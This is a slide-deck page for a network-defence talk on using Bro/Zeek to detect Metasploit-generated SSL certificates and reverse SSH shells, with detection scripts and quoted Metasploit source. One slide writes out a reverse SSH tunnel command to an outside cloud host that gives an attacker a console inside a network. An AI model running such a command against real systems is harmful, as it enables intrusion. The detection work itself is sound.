brotection
play

Brotection John B. Althouse, III Salesforce - PowerPoint PPT Presentation

Mar 11, 2023 •319 likes •811 views

Brotection John B. Althouse, III Salesforce john.b.althouse@gmail.com @404A41 Bro Bro is Watching 0101011101010001010101010101010010101010101010 1010101010101011101010001010101010101010010101 0101010101010101010101011101010001010101010101

  1. Brotection John B. Althouse, III Salesforce john.b.althouse@gmail.com @404A41

  2. Bro

  3. Bro is Watching

  4. 0101011101010001010101010101010010101010101010 1010101010101011101010001010101010101010010101 0101010101010101010101011101010001010101010101 010010101010101010101010101 ect. ect.

  5. Network Security Monitoring COMMAND AND RECON EXPLOIT ACTIONS CONTROL NSM NSM NSM NSM Full PCAP Full PCAP Full PCAP Full PCAP NIDS* NIDS* NIDS* HIDS Cloud HIDS HIDS Monitoring

  6. Your first look at the Bro logs...

  7. SSL Cert Detection Detection for all things HTTPS

  8. Advisaries ● Threat Actors ○ State Sponsored ■ APT1,000 ○ Money Driven ■ You computer are locked by FBI, us you will pay. ○ Hacktivists ■ $cr1p7 k1dd13z ● lolerkoperz

  9. DERBY CON

  10. SSL Certs Remember, threat actors are humans. ● Generally lazy. ● Take the shortest path first. ● Have pride in their work.

  11. SSL Certs Threat actors generally use: ● The same cert. ● The same cert generation tool or algorithm. ● Especially if they wrote it. ● The same pool of certs. This is good intel to share.

  12. Adding to Bro Intel Framework @load base/frameworks/intel @load base/files/x509 @load policy/frameworks/intel/seen/where-locations module Intel; export { redef enum Intel::Type += { Intel::CERT_SERIAL }; } event x509_certificate(f: fa_file, cert_ref: opaque of x509, cert: X509:: Certificate) { Intel::seen([$indicator=cert$serial, $indicator_type=Intel:: CERT_SERIAL, $f=f, $where=X509::IN_CERT]); }

  13. Metasploit SSL Certs Detection for all things Metasploit HTTPS

  14. Default Metasploit SSL Cert in Bro x509.log certificate.issuer: CN=hrzvox.gov,O=bdlOFqMXlUfgoNQljMuRWgiJ, L=ZTIhjQVsJEuQIlSgScdegcLSLJVRE,ST=WI,C=US certificate.subject: CN=vl3qykkr.com,O=UPdkxNEasODSAlkvuadEMm, L=SZewokfDFSkaAsfKyeJMNtfleGT,ST=NV,C=US

  15. /usr/share/metasploit-framework/lib/rex/socket/ssl_tcp_server.rb def makessl(params) ssl_cert = params.ssl_cert if ssl_cert issuer = OpenSSL::X509::Name.new([ ["C","US"], ['ST', Rex::Text.rand_state()], ["L", Rex::Text.rand_text_alpha(rand(20) + 10)], ["O", Rex::Text.rand_text_alpha(rand(20) + 10)], ["CN", Rex::Text.rand_hostname], ])

  16. /usr/share/metasploit-framework/lib/rex/text.rb def self.rand_hostname host = [] (rand(5) + 1).times { host.push(Rex::Text.rand_text_alphanumeric(rand(10) + 1)) } host.push(TLDs.sample) host.join('.').downcase end TLDs = ['com', 'net', 'org', 'gov', 'biz', 'edu']

  17. /usr/share/metasploit-framework/lib/rex/text.rb def self.rand_state() States.sample end States = ["AK", "AL", "AR", "AZ", "CA", "CO", "CT", "DE", "FL", "GA", "HI", "IA", "ID", "IL", "IN", "KS", "KY", "LA", "MA", "MD", "ME", "MI", "MN", "MO", "MS", "MT", "NC", "ND", "NE", "NH", "NJ", "NM", "NV", "NY", "OH", "OK", "OR", "PA", "RI", "SC", "SD", "TN", "TX", "UT", "VA", "VT", "WA", "WI", "WV", "WY"]

  18. /usr/share/metasploit-framework/lib/rex/text.rb def self.rand_text_alpha(len, bad='') foo = [] foo += ('A' .. 'Z').to_a foo += ('a' .. 'z').to_a rand_base(len, bad, *foo ) end

  19. /usr/share/metasploit-framework/lib/rex/socket/ssl_tcp_server.rb def makessl(params) ssl_cert = params.ssl_cert if ssl_cert issuer = OpenSSL::X509::Name.new([ ["C","US"], ['ST', Rex::Text.rand_state()], ["L", Rex::Text.rand_text_alpha(rand(20) + 10)], ["O", Rex::Text.rand_text_alpha(rand(20) + 10)], ["CN", Rex::Text.rand_hostname], ])

  20. Default Metasploit SSL Cert in Bro x509.log certificate.issuer: CN=hrzvox.gov, O=bdlOFqMXlUfgoNQljMuRWgiJ, L=ZTIhjQVsJEuQIlSgScdegcLSLJVRE, ST=WI, C=US

  21. Regex match on rand mixed alpha? bdlOFqMXlUfgoNQljMuRWgiJ ZTIhjQVsJEuQIlSgScdegcLSLJVRE alDSFlkasfQWAFlksSA aAfkVCIQmdSDlEkfASgKJZEk KfaNmtFxGPtqeK jQVsJEuQIlSgoNQljMuR CIQmddlOFqMXlUlDSFSgQljM SgoNQljasfOFqMXl KfIKwlMCZoetFFaLKXZ

  22. [a-z][A-Z]{2}

  23. if ( !(cert?$issuer) || (/C=US/ !in cert$issuer) ) return; local conn: connection; for ( c in f$conns ) conn=f$conns[c]; local metasploit = /[a-z][A-Z]{2}/ ; local x509_data: table[string] of string = table(); local parts = split(cert$issuer, /,/); for ( part_index in parts ) { local key_val = split1(parts[part_index], /=/); if ( 2 in key_val) x509_data[key_val[1]] = key_val[2]; } if ( "C" in x509_data && x509_data ["C"] == "US" && "L" in x509_data && metasploit in x509_data["L"] ) NOTICE([$note=Metasploit_SSL_Cert, $conn=conn, $msg=fmt("Metasploit SSL, random issuer US city '%s'", x509_data["L"]), $sub=cert$issuer, $identifier=cert$issuer]);

  24. ALERT TS: 1608132328.219263 UID: CRfYLk13zS5KEkapCc Orig: 10.1.2.3 31337 Resp: 192.0.2.1 443 tcp Note: SSL::Metasploit_SSL_Cert Msg: Metasploit SSL, random issuer US city 'ZTIhjQVsJEuQIlSgScdegcLSLJVRE' Sub: CN=hrzvox.gov,O=bdlOFqMXlUfgoNQljMuRWgiJ, L=ZTIhjQVsJEuQIlSgScdegcLSLJVRE, ST=WI,C=US Source: 10.1.2.3 Dest: 192.0.2.1 443 Notice::ALERT

  25. Metasploit SSL Round 2 The Inevitable Update

  26. Metasploit SSL Cert Round 2

  28. Metasploit SSL Cert Round 2 def self.ssl_generate_certificate yr = 24*3600*365 vf = Time.at(Time.now.to_i - rand(yr * 3) - yr) vt = Time.at(vf.to_i + (10 * yr)) cn = Rex::Text.rand_text_alpha_lower(rand(8)+2) key = OpenSSL::PKey::RSA.new(2048){ } cert = OpenSSL::X509::Certificate.new cert.version = 2 cert.serial = (rand(0xFFFFFFFF) << 32) + rand(0xFFFFFFFF) cert.subject = OpenSSL::X509::Name.new([["CN", cn]]) cert.issuer = OpenSSL::X509::Name.new([["CN", cn]]) cert.not_before = vf cert.not_after = vt cert.public_key = key.public_key ef = OpenSSL::X509::ExtensionFactory.new(nil,cert) cert.extensions = [ ef.create_extension("basicConstraints","CA:FALSE") ] ef.issuer_certificate = cert cert.sign(key, OpenSSL::Digest::SHA256.new)

  29. Metasploit SSL Round 2 ssl.log: ip.orig_h: 10.1.2.3 ip.orig_P: 1984 ip.resp_h: 192.0.2.1 ip.resp_p: 443 subject: CN=qjpozixk issuer: CN=qjpozixk version: TLSv12 cipher: TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 validation_status: self signed certificate

  30. Snakeoil Cert Metasploit Cert ● Issuer contains CN only ● Issuer contains CN only ● Issuer and Subject are the same ● Issuer and Subject are the same ● 2048bit Key ● 2048bit Key ● Version 3 ● Version 3 ● Valid for 10 years ● Valid for 10 years ○ Starting now ○ Starting now - rand(yr * 3) - yr ● Usually SHA1 (for now) ● Always SHA256 ● CN = Hostname.Domain ● CN = rand_text_alpha_lower(rand(8)+2)

  31. Snakeoil Cert Metasploit Cert ● Issuer contains CN only ● Issuer contains CN only ● Issuer and Subject are the same ● Issuer and Subject are the same ● 2048bit Key ● 2048bit Key ● Version 3 ● Version 3 ● Valid for 10 years ● Valid for 10 years ○ Starting now ○ Starting now - rand(yr * 3) - yr ● Usually SHA1 (for now) ● Always SHA256 ● CN = Hostname.Domain ● CN = rand_text_alpha_lower(rand(8)+2)

  32. Bro Script event ssl_established(c: connection ) { if ( c$id$resp_h in 10.0.0.0/8 ) { return; } if ( ! c$ssl?$subject ) { return; } if ( ! c$ssl?$issuer ) { return; } if ( c$ssl$subject != c$ssl$issuer ) { return; } if ( c$ssl$subject in falselist ) { return; } if ( /^CN=[a-z]{2,10}$/ == c$ssl$subject ) if ( /^.+SHA256$/ == c$ssl$cipher ) NOTICE([$note=Metasploit_SSL_Cert, $conn=c, $msg=fmt("Metasploit Style Randomly Generated SSL Cert, '%s'", c$ssl$subject), $sub=c$ssl$issuer])

  33. Reverse SSH Shells Credit: W’s epiphany

  34. Reverse SSH Shells Exploit script on internal host runs this command: ssh -R 2222:localhost:22 user@something.amazonws.com Then on your Amazon c2 server: ssh localhost -p 2222 You are now sitting at a full console inside the network. And all communication is over SSH, encrypted, to Amazon.

  35. Reverse SSH Shells AWS IPs do not make for good intel indicators. The reverse SSH communication is a good indicator to share. Let’s detect that.

  36. Reverse SSH Shells With every key press a packet is sent and received. client > server: p client < server: p client > server: w client < server: w client > server: d client < server: d

  37. Reverse SSH Shells Each single character packet is padded: 48 bytes (linux) 42 bytes (mac) client > server: p (48 bytes) client < server: p (48 bytes) client > server: w (48 bytes) client < server: w (48 bytes)

  38. Reverse SSH Shells Reverse SSH packets are double padded: 96 bytes (linux) 84 bytes (mac) client < server: p (96 bytes) client > server: p (96 bytes) client < server: w (96 bytes) client > server: w (96 bytes)

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

2A

2A

Workshop 2A

898 views • 40 slides
CULTIVATING TRUST IN THE DIGITAL AGE Michelle Cooper, Senior Governance Advisor, Diligent Josh

CULTIVATING TRUST IN THE DIGITAL AGE Michelle Cooper, Senior Governance Advisor, Diligent Josh

CULTIVATING TRUST IN THE DIGITAL AGE Michelle Cooper, Senior Governance Advisor, Diligent Josh Fruecht, Governance Advisor and Former Clerk, Diligent Monday, October 21 Agenda Civic Trust: Trends Shifting Your Organizational Culture

483 views • 23 slides
Transaction Management Part I: Concurrency Control vanilladb.org Tx Management VanillaCore

Transaction Management Part I: Concurrency Control vanilladb.org Tx Management VanillaCore

Transaction Management Part I: Concurrency Control vanilladb.org Tx Management VanillaCore JDBC Interface (at Client Side) Remote.JDBC (Client/Server) Server Query Interface Tx Planner Parse Algebra Storage Interface Sql/Util

914 views • 87 slides
GROINSS-V II Multicenter observational study Is radiotherapy a safe alternative for

GROINSS-V II Multicenter observational study Is radiotherapy a safe alternative for

GROINSS-V II Multicenter observational study Is radiotherapy a safe alternative for lymphadenectomy in patients with a positive SN ? SN negative : follow-up SN positive : radiotherapy (50 Gy) Update GROINSS-V II Dec 2005 Oct

294 views • 4 slides
Easing the Pain of Astronomical Database Access Disclaimer: I usually present this software to

Easing the Pain of Astronomical Database Access Disclaimer: I usually present this software to

Easing the Pain of Astronomical Database Access Disclaimer: I usually present this software to non VO-savvy people What is VODb? A desktop application that aims to simplify the process of querying astronomical databases A little history

414 views • 38 slides
Six Rules for Change (c) 2017 esther@estherderby.com @estherderby drive change (c) 2017

Six Rules for Change (c) 2017 esther@estherderby.com @estherderby drive change (c) 2017

Six Rules for Change (c) 2017 esther@estherderby.com @estherderby drive change (c) 2017 esther@estherderby.com @estherderby install change (c) 2017 esther@estherderby.com @estherderby implement change (c) 2017

879 views • 23 slides
Lies, Damned Lies &amp; Data Breach Statistics Tony Brookes www.derby.ac.uk I wondered how

Lies, Damned Lies &amp; Data Breach Statistics Tony Brookes www.derby.ac.uk I wondered how

Lies, Damned Lies &amp; Data Breach Statistics Tony Brookes www.derby.ac.uk I wondered how often people lose data How likely are they to lose a memory stick or CD with enough data on it to bring us to the ICOs attention. I

512 views • 18 slides
Alan Charles The Police and Crime Commissioner for Derbyshire Mary Creagh MP Shadow Secretary

Alan Charles The Police and Crime Commissioner for Derbyshire Mary Creagh MP Shadow Secretary

Alan Charles The Police and Crime Commissioner for Derbyshire Mary Creagh MP Shadow Secretary of State for Defra Detective Inspector Nevin Hunter National Wildlife Crime Unit Wildlife crime partnership working and intelligence gathering

1.07k views • 85 slides
I'll Tell You What I Want, What I Really Really Want An Industry Perspective on the Effective

I'll Tell You What I Want, What I Really Really Want An Industry Perspective on the Effective

I'll Tell You What I Want, What I Really Really Want An Industry Perspective on the Effective Application of Research in Projects CESI 2015 at ICSE. Florence , 18 th May 2015 Alistair Mavin mav.email@sky.com https://www.flickr.com/photos/rolls

233 views • 20 slides
The Three Southern Counties (the 3SC): The devolution proposition for ITEM 13 West Sussex, East

The Three Southern Counties (the 3SC): The devolution proposition for ITEM 13 West Sussex, East

Page 135 The Three Southern Counties (the 3SC): The devolution proposition for ITEM 13 West Sussex, East Sussex and Surrey ITEM 13 The case for a 3SC devolution deal Rationale The prize and its benefits Workstreams Page 136

617 views • 14 slides
eLearning and Nutrition Education for Lower- Income Audiences Lauren Au, PhD, RD Society for

eLearning and Nutrition Education for Lower- Income Audiences Lauren Au, PhD, RD Society for

eLearning and Nutrition Education for Lower- Income Audiences Lauren Au, PhD, RD Society for Nutrition Education and Behavior Conference Lorelei Jones, M.Ed Barbara Lohse, PhD, RD, CDN July 23, 2017 Jessica Silldorff, MPH Sarah Stotz, PhD,

901 views • 77 slides
Business Planning in Uncertain Times For Vermont Specialty Food Association &amp; Vermont Retail

Business Planning in Uncertain Times For Vermont Specialty Food Association &amp; Vermont Retail

Business Planning in Uncertain Times For Vermont Specialty Food Association &amp; Vermont Retail &amp; Grocers Association April 3, 2020 Bryan Ducharme www.venture7advisors.com (802) 489-7700 1 This is different Strong economy deliberately

294 views • 17 slides
IDT? Trey Martindale, Ed.D. Associate Professor Analysis, design, development, and evaluation of

IDT? Trey Martindale, Ed.D. Associate Professor Analysis, design, development, and evaluation of

Martindale Consultants Better Learning by Design Martindale Consultants Better Learning by Design IDT? Trey Martindale, Ed.D. Associate Professor Analysis, design, development, and evaluation of e ff ective learning environments Instructional

526 views • 10 slides
Chapter 6B Character Depth The visual appearance of a character is not enough to convey

Chapter 6B Character Depth The visual appearance of a character is not enough to convey

Chapter 6B Character Depth The visual appearance of a character is not enough to convey information about what role will the character play in a story, how he will behave in different situations or how he will interact with the games core

477 views • 4 slides
I. Introduction I. Introduction Importance of Information Technology (IT) Importance of

I. Introduction I. Introduction Importance of Information Technology (IT) Importance of

Basi di Dati e Sistemi informativi II A.A. 2002/2003 I. Introduction I. Introduction Importance of Information Technology (IT) Importance of Information Technology (IT) Information Systems and Organizations Information Systems and

476 views • 18 slides
North West Behavioural Science Symposium Wednesday May 22 nd 2019 Halliwell Jones Stadium

North West Behavioural Science Symposium Wednesday May 22 nd 2019 Halliwell Jones Stadium

North West Behavioural Science Symposium Wednesday May 22 nd 2019 Halliwell Jones Stadium Warrington WA2 7NE 09.30 15.45 Tweet us on @nwphpn using #BhSci2019 10:00 10:15: Welcome (5 mins) Dr Sakthi Karunanithi , Director of Public

2.06k views • 157 slides
How content design helps create truly inclusive services Lorena Sutherland @lolylena Hello,

How content design helps create truly inclusive services Lorena Sutherland @lolylena Hello,

How content design helps create truly inclusive services Lorena Sutherland @lolylena Hello, Im Lorena. This session is about Accessibility and inclusivity Law and standards Barriers and challenges Understanding users Inclusive

1.35k views • 92 slides
Deliberate Architecture Responding to Requirements over Following Fashion Dr Robert Smallshire

Deliberate Architecture Responding to Requirements over Following Fashion Dr Robert Smallshire

Deliberate Architecture Responding to Requirements over Following Fashion Dr Robert Smallshire @robsmallshire @sixty_north 1 2 3 4 Gartner Hype Cycle https://en.wikipedia.org/wiki/Hype_cycle 5 Gartner Hype Cycle Plug-ins UML

633 views • 46 slides
Polk County, Iowa CoC HOMELESS POINT-IN-TIME AND HOUSING INVENTORY COUNTS PREPARED BY THE

Polk County, Iowa CoC HOMELESS POINT-IN-TIME AND HOUSING INVENTORY COUNTS PREPARED BY THE

Polk County, Iowa CoC HOMELESS POINT-IN-TIME AND HOUSING INVENTORY COUNTS PREPARED BY THE INSTITUTE FOR COMMUNITY ALLIANCES, DES MOINES, IA Polk County CoC Homeless Point-in-Time Count Totals January Point-in-Time Client Count 1200 1020

577 views • 19 slides
W E S T D E S M O I N E S C O M M U N I T Y S C H O O L D I S T R I C T - E A R L Y R E T I

W E S T D E S M O I N E S C O M M U N I T Y S C H O O L D I S T R I C T - E A R L Y R E T I

W E S T D E S M O I N E S C O M M U N I T Y S C H O O L D I S T R I C T - E A R L Y R E T I R E M E N T M E D I C A L / D E N T A L P L A N O P T I O N S O c t o b e r 2 8 , 2 0 1 5 EARLY RETRI EMENT MEDI CAL/DENTAL PLAN OPTI ONS ME

260 views • 15 slides
S First Unitarian Church of Des Moines 2018 Annual Congregational Meeting Welcome, Opening Words

S First Unitarian Church of Des Moines 2018 Annual Congregational Meeting Welcome, Opening Words

2018 Annual Congregational Meeting S First Unitarian Church of Des Moines 2018 Annual Congregational Meeting Welcome, Opening Words and Chalice Lighting Mike Stimson, Board President S First Unitarian Church of Des Moines People : In this

668 views • 29 slides
Introduction to Stata 17.871 Spring 2012 1 The role of statistical packages in research

Introduction to Stata 17.871 Spring 2012 1 The role of statistical packages in research

Introduction to Stata 17.871 Spring 2012 1 The role of statistical packages in research Obvious answer Manage data Carry out appropriate statistical tests Assist in displaying data Less obvious answer Channel the type of

590 views • 33 slides
House Price Beliefs and Mortgage Leverage Choice by Bailey Davlia Kuchler Stroebel Discussion by

House Price Beliefs and Mortgage Leverage Choice by Bailey Davlia Kuchler Stroebel Discussion by

House Price Beliefs and Mortgage Leverage Choice by Bailey Davlia Kuchler Stroebel Discussion by Christopher Carroll 1 1 Johns Hopkins University ccarroll@jhu.edu NBER Behavioral Macroeconomics Workshop, July 14, 2017 All the Ingredients for

1.2k views • 104 slides
DAY WIT Y WITH H THE HE SU SUPERINT RINTENDE NDENT NT Ap Apri ril l 17, , 2014 IOWA

DAY WIT Y WITH H THE HE SU SUPERINT RINTENDE NDENT NT Ap Apri ril l 17, , 2014 IOWA

Welcom lcome e to th o the 21st t An Annual al DAY WIT Y WITH H THE HE SU SUPERINT RINTENDE NDENT NT Ap Apri ril l 17, , 2014 IOWA DIVISION OF BANKING EMPLOYEES Mark Anderson Brad Hart Janet OBrien Peter Angus David Huang

444 views • 11 slides

More recommend